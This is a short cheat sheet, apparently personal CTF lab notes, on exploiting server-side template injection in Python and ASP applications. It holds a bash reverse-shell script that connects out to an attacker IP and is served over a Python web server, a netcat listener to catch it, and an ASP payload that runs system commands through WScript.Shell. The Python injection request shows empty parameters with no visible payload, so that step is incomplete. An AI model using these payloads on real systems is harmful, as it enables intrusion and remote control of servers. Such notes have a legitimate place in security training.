Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
PYTHON
There are several sources to get SSTI payloads to test such as payloadbox and hacktricks, this one has a detailed explanation about this vulnerability and a methodology that we can use to test inputs for SSTI abuse.
First we need to inject our payload within the request:
1
2
3
4
POST / HTTP/1.1
.
.
costume=&q=ad&addr=ad
Create a script and name it as index.html:
1
2
3
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.16.5/1235 0>&1'
Start our python under the same path as index.html to share it:
1
2
3
sudo python3 -m http.server 80
nc -lvnp 1235
Examples: Epsilon
ASP
It is possible to exploit an ASP SSTI with the following payload:
1
<%response.write (7*7)%>
If the response reflects a “49” then you can use this payload to get RCE:
1
<%response.write CreateObject("WScript.Shell").Exec("cmd /c ping -n 1 10.10.14.4").StdOut.Readall()%>
Examples: [[Anubis#^95c992]]